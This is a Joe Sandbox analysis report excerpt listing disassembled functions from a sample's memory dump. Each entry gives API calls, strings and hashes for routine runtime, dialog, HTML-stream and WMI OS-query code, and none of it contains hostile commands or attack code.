Instruction Fuzzy Hash: 33516760600F4557DF384A288596BBFE7C9DB12300F1808EBE986DB392F625ED45C3A2

Function 00BBEFE2 Relevance: .2, Instructions: 161COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4174c036c4950e25d046357a5ac8a1c31cf2a975a4127c8a88ba0d077c7c0394
Instruction ID: 78fdd37f6b17b082dbc0c35a1e369b1ef2414e854b7463ae823e0a9e1b716889
Opcode Fuzzy Hash: 4174c036c4950e25d046357a5ac8a1c31cf2a975a4127c8a88ba0d077c7c0394
Instruction Fuzzy Hash: 0351C4315083D68FC712DF28C9404BEBFF0AE9A314F4A09EDE4D95B243C261DA4ACB52

Function 00BC00B7 Relevance: .1, Instructions: 141COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 011a468604b678aa2ac04b21cc319ee836b6c2bd5b5af96f7bb4e2e4dc662bbf
Instruction ID: 2f8eca818adc004a848bd48838ad05c51f336bb9f706d00a38c4f0bfff23ff65
Opcode Fuzzy Hash: 011a468604b678aa2ac04b21cc319ee836b6c2bd5b5af96f7bb4e2e4dc662bbf
Instruction Fuzzy Hash: E251DFB1A087159FC748CF19D48065AF7E1FF88314F058A2EE899E3340D735EA59CB9A

Function 00BC3E0B Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
Instruction ID: ba7bc24fd3eac1d63f7ce7dab3abe15a555a73d2d9dd7b579b9361eeef228746
Opcode Fuzzy Hash: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
Instruction Fuzzy Hash: AC3128B1A147068FCB14DF28C8916AEFBE0FB95704F40896DE485C7741C774EA0ACB91

Function 00BBE2E8 Relevance: 26.5, APIs: 12, Strings: 3, Instructions: 234COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 00BBE30E

Part of subcall function 00BB4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00BB40A5

Part of subcall function 00BC1DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00BF1030,00000200,00BBD928,00000000,?,00000050,00BF1030), ref: 00BC1DC4

_strlen.LIBCMT ref: 00BBE32F
SetDlgItemTextW.USER32(?,00BEE274,?), ref: 00BBE38F
GetWindowRect.USER32(?,?), ref: 00BBE3C9
GetClientRect.USER32(?,?), ref: 00BBE3D5
GetWindowLongW.USER32(?,000000F0), ref: 00BBE475
GetWindowRect.USER32(?,?), ref: 00BBE4A2
SetWindowTextW.USER32(?,?), ref: 00BBE4DB
GetSystemMetrics.USER32(00000008), ref: 00BBE4E3
GetWindow.USER32(?,00000005), ref: 00BBE4EE
GetWindowRect.USER32(00000000,?), ref: 00BBE51B
GetWindow.USER32(00000000,00000002), ref: 00BBE58D

Strings

CAPTION, xrefs: 00BBE4BD
$%s:, xrefs: 00BBE302
d, xrefs: 00BBE3F5

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
String ID: $%s:$CAPTION$d
API String ID: 2407758923-2512411981
Opcode ID: d77ecd0635f34402baa1efbaa29ac8d4893065fd40a925f45bda33fd1d1d3cff
Instruction ID: 4e889f3b9c57282fb22ae8d56b8b9fe77631cd4254d8a589c1d8ddb38c46456f
Opcode Fuzzy Hash: d77ecd0635f34402baa1efbaa29ac8d4893065fd40a925f45bda33fd1d1d3cff
Instruction Fuzzy Hash: B881A171208341AFD710DF68CC89BAFBBE9FB89704F04491DFA95A7250D774E9058B52

Function 00BDCB22 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 00BDCB66

Part of subcall function 00BDC701: _free.LIBCMT ref: 00BDC71E
Part of subcall function 00BDC701: _free.LIBCMT ref: 00BDC730
Part of subcall function 00BDC701: _free.LIBCMT ref: 00BDC742
Part of subcall function 00BDC701: _free.LIBCMT ref: 00BDC754
Part of subcall function 00BDC701: _free.LIBCMT ref: 00BDC766
Part of subcall function 00BDC701: _free.LIBCMT ref: 00BDC778
Part of subcall function 00BDC701: _free.LIBCMT ref: 00BDC78A
Part of subcall function 00BDC701: _free.LIBCMT ref: 00BDC79C
Part of subcall function 00BDC701: _free.LIBCMT ref: 00BDC7AE
Part of subcall function 00BDC701: _free.LIBCMT ref: 00BDC7C0
Part of subcall function 00BDC701: _free.LIBCMT ref: 00BDC7D2
Part of subcall function 00BDC701: _free.LIBCMT ref: 00BDC7E4
Part of subcall function 00BDC701: _free.LIBCMT ref: 00BDC7F6

_free.LIBCMT ref: 00BDCB5B

Part of subcall function 00BD8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00BDC896,?,00000000,?,00000000,?,00BDC8BD,?,00000007,?,?,00BDCCBA,?), ref: 00BD8DE2
Part of subcall function 00BD8DCC: GetLastError.KERNEL32(?,?,00BDC896,?,00000000,?,00000000,?,00BDC8BD,?,00000007,?,?,00BDCCBA,?,?), ref: 00BD8DF4

_free.LIBCMT ref: 00BDCB7D
_free.LIBCMT ref: 00BDCB92
_free.LIBCMT ref: 00BDCB9D
_free.LIBCMT ref: 00BDCBBF
_free.LIBCMT ref: 00BDCBD2
_free.LIBCMT ref: 00BDCBE0
_free.LIBCMT ref: 00BDCBEB
_free.LIBCMT ref: 00BDCC23
_free.LIBCMT ref: 00BDCC2A
_free.LIBCMT ref: 00BDCC47
_free.LIBCMT ref: 00BDCC5F

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: ca18410a640f11add840cca92302b262a3de2e755bae2d35f5000568911ccd25
Instruction ID: 89558803d8916146ff2fde71882c783ad442731b6f2e17f9bc1d785065db0b29
Opcode Fuzzy Hash: ca18410a640f11add840cca92302b262a3de2e755bae2d35f5000568911ccd25
Instruction Fuzzy Hash: 4E314C3160460AAFEB20AA39D846B5AFBE9EF54311F1444ABE158D6392EF71EC40CB54

Function 00BC9711 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 126memoryCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00BC9736
_wcslen.LIBCMT ref: 00BC97D6
GlobalAlloc.KERNEL32(00000040,?), ref: 00BC97E5
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00BC9806
CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00BC982D

Strings

<html>, xrefs: 00BC9755, 00BC978E
<head><meta http-equiv="content-type" content="text/html; charset=, xrefs: 00BC9760
</html>, xrefs: 00BC97B7
utf-8"></head>, xrefs: 00BC976B

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: Global_wcslen$AllocByteCharCreateMultiStreamWide
String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
API String ID: 1777411235-4209811716
Opcode ID: e01aae4076b96ede2939b286ad3e26d1b8eacb8d77ac6d259b7f5ebf142018ec
Instruction ID: 5556a2d12995c9b2919b69c89e5d7ceeb2894d46dd628a0760324f91d8f61f45
Opcode Fuzzy Hash: e01aae4076b96ede2939b286ad3e26d1b8eacb8d77ac6d259b7f5ebf142018ec
Instruction Fuzzy Hash: 373123325083417BF725AB249C4AFABB7D8EF52710F14019EF501A72D2FF64DA0483A6

Function 00BCD69E Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 79windowCOMMON

Download Yara Rule

APIs

GetWindow.USER32(?,00000005), ref: 00BCD6C1
GetClassNameW.USER32(00000000,?,00000800), ref: 00BCD6ED

Part of subcall function 00BC1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00BBC116,00000000,.exe,?,?,00000800,?,?,?,00BC8E3C), ref: 00BC1FD1

GetWindowLongW.USER32(00000000,000000F0), ref: 00BCD709
SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 00BCD720
GetObjectW.GDI32(00000000,00000018,?), ref: 00BCD734
SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 00BCD75D
DeleteObject.GDI32(00000000), ref: 00BCD764
GetWindow.USER32(00000000,00000002), ref: 00BCD76D

Strings

STATIC, xrefs: 00BCD6F3

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
String ID: STATIC
API String ID: 3820355801-1882779555
Opcode ID: ef3816252271be02e604b6d93107438b732a1f4b459c8cf988b145c8c622dedf
Instruction ID: 7829e74455cebcab23da9e344ac14220e6950ebff8f953a6b21824eb9b3684df
Opcode Fuzzy Hash: ef3816252271be02e604b6d93107438b732a1f4b459c8cf988b145c8c622dedf
Instruction Fuzzy Hash: 741102362403507BE6216B709C4AFEF76DCFB15715F008169FA41B6092DB748E0642B5

Function 00BD96F1 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00BD9705

Part of subcall function 00BD8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00BDC896,?,00000000,?,00000000,?,00BDC8BD,?,00000007,?,?,00BDCCBA,?), ref: 00BD8DE2
Part of subcall function 00BD8DCC: GetLastError.KERNEL32(?,?,00BDC896,?,00000000,?,00000000,?,00BDC8BD,?,00000007,?,?,00BDCCBA,?,?), ref: 00BD8DF4

_free.LIBCMT ref: 00BD9711
_free.LIBCMT ref: 00BD971C
_free.LIBCMT ref: 00BD9727
_free.LIBCMT ref: 00BD9732
_free.LIBCMT ref: 00BD973D
_free.LIBCMT ref: 00BD9748
_free.LIBCMT ref: 00BD9753
_free.LIBCMT ref: 00BD975E
_free.LIBCMT ref: 00BD976C

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 61acd44c11175fc0a6c9ba0d2ed190772ec0e4a8af12b669e9b2e0c71984835b
Instruction ID: b9f2c9cb43ee233572a14328ac8df6c54d0706744078374f64e26626d1454200
Opcode Fuzzy Hash: 61acd44c11175fc0a6c9ba0d2ed190772ec0e4a8af12b669e9b2e0c71984835b
Instruction Fuzzy Hash: A211B97A110109BFCB01EF54C842CDD7BB6EF58351B5154E6FA084F2A2EE31DE509B84

Function 00BD2E31 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 303COMMONLIBRARYCODE

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 00BD2F50
___TypeMatch.LIBVCRUNTIME ref: 00BD305E
_UnwindNestedFrames.LIBCMT ref: 00BD31B0
CallUnexpected.LIBVCRUNTIME ref: 00BD31CB
_abort.LIBCMT ref: 00BD31D0

Strings

csm, xrefs: 00BD2E6E
csm, xrefs: 00BD2F87
csm, xrefs: 00BD2EDB

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
String ID: csm$csm$csm
API String ID: 322700389-393685449
Opcode ID: ee2e62b9b8a379465b083304b9091d770e227d024ca974dd8d038b904eff6814
Instruction ID: 51ee02707a0cbe97e5a07c825dfbbea2e644d4c3363611d6f4cb428db0e42f13
Opcode Fuzzy Hash: ee2e62b9b8a379465b083304b9091d770e227d024ca974dd8d038b904eff6814
Instruction Fuzzy Hash: F4B1477190024AEFCF29DFA4C8819AEFBF5EF14710B14459AE8056B312E735DA51CB92

Function 00BB6FA5 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 134COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00BB6FAA
_wcslen.LIBCMT ref: 00BB7013
_wcslen.LIBCMT ref: 00BB7084

Part of subcall function 00BB7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00BB7AAB
Part of subcall function 00BB7A9C: GetLastError.KERNEL32 ref: 00BB7AF1
Part of subcall function 00BB7A9C: CloseHandle.KERNEL32(?), ref: 00BB7B00

Strings

SeCreateSymbolicLinkPrivilege, xrefs: 00BB6FCC
SeRestorePrivilege, xrefs: 00BB6FC2
UNC\, xrefs: 00BB7051
\??\, xrefs: 00BB702B

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: _wcslen$CloseCurrentErrorH_prologHandleLastProcess
String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
API String ID: 3122303884-3508440684
Opcode ID: fc4cc707b026e3e5393701ec90f4a465dc6746d02390f7b33000b8c195aa2ba4
Instruction ID: 81692282f510f192efb969c37be37b70b29298e6eb6177f37f7c2c644ad626d8
Opcode Fuzzy Hash: fc4cc707b026e3e5393701ec90f4a465dc6746d02390f7b33000b8c195aa2ba4
Instruction Fuzzy Hash: BA41B6B1D48384ABEB21A7749C86FFEB7ECDF44704F0044D6FA55A7182DAB49A448721

Function 00BCB5C0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00BB1316: GetDlgItem.USER32(00000000,00003021), ref: 00BB135A
Part of subcall function 00BB1316: SetWindowTextW.USER32(00000000,00BE35F4), ref: 00BB1370

EndDialog.USER32(?,00000001), ref: 00BCB610
SendMessageW.USER32(?,00000080,00000001,?), ref: 00BCB637
SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 00BCB650
SetWindowTextW.USER32(?,?), ref: 00BCB661
GetDlgItem.USER32(?,00000065), ref: 00BCB66A
SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 00BCB67E
SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00BCB694

Strings

LICENSEDLG, xrefs: 00BCB5D4

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: MessageSend$Item$TextWindow$Dialog
String ID: LICENSEDLG
API String ID: 3214253823-2177901306
Opcode ID: 6e3a4b810bb98db57bd4f2b912f9dfe41c18ced747af3359da1f810fed029123
Instruction ID: d8f5b48e67db101423cc2c389587abf0d92e2dbcaa4956930e3c82a335c3a2e9
Opcode Fuzzy Hash: 6e3a4b810bb98db57bd4f2b912f9dfe41c18ced747af3359da1f810fed029123
Instruction Fuzzy Hash: 3F21B132204205BBE6219B76ED4BF7F7BECFB4BB45F014068F601A25A0DB529901D635

Function 00BCFD10 Relevance: 13.7, APIs: 9, Instructions: 154memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,A6EE96F2,00000001,00000000,00000000,?,?,00BBAF6C,ROOT\CIMV2), ref: 00BCFD99
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,?,00BBAF6C,ROOT\CIMV2), ref: 00BCFE14
SysAllocString.OLEAUT32(00000000), ref: 00BCFE1F
_com_issue_error.COMSUPP ref: 00BCFE48
_com_issue_error.COMSUPP ref: 00BCFE52
GetLastError.KERNEL32(80070057,A6EE96F2,00000001,00000000,00000000,?,?,00BBAF6C,ROOT\CIMV2), ref: 00BCFE57
_com_issue_error.COMSUPP ref: 00BCFE6A
GetLastError.KERNEL32(00000000,?,?,00BBAF6C,ROOT\CIMV2), ref: 00BCFE80
_com_issue_error.COMSUPP ref: 00BCFE93

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
String ID:
API String ID: 1353541977-0
Opcode ID: 1a425d68cef0cf558c6698435c588541a8ac4de0e1592e4532e7a668c4066b48
Instruction ID: 2e8e407908fa90d6583f9b19e492528603ad167397c20ea430727a4053f65bef
Opcode Fuzzy Hash: 1a425d68cef0cf558c6698435c588541a8ac4de0e1592e4532e7a668c4066b48
Instruction Fuzzy Hash: 1241D971A0025AABCB109F65CC45FBFBBE9EB48B10F1042FEF915E7291DB34990087A5

Function 00BBAF24 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 210COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00BBAF29

Strings

Name, xrefs: 00BBB0B0
SELECT * FROM Win32_OperatingSystem, xrefs: 00BBAFCA
Windows 10, xrefs: 00BBB0C2
WQL, xrefs: 00BBAFDC
ROOT\CIMV2, xrefs: 00BBAF5C

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
